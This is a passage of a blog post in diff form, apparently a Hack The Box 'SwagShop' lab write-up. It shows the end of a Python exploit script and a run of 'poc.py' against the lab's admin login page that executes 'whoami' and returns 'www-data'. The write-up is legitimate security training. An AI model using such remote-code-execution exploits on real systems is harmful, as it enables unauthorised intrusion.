rizemon/rizemon.github.io/_posts/2019-09-29-swagshop-htb.markdown

     print e.read()
 {% endhighlight %}

 For the `install_date` variable, it can be found in `http://swagshop.htb/app/etc/local.xml`.
 Now lets test it out with a `whoami` command.
 For the `target` variable, which is the first argument, it is the URL of the admin login page (`http://10.10.10.140.htb/index.php/admin`).
+Note that we cannot use the domain name `swagshop.htb` as we will always be redirected to `10.10.10.140` for some reason.

 {% highlight bash %}
 $ python poc.py http://10.10.10.140/index.php/admin "whoami"
 www-data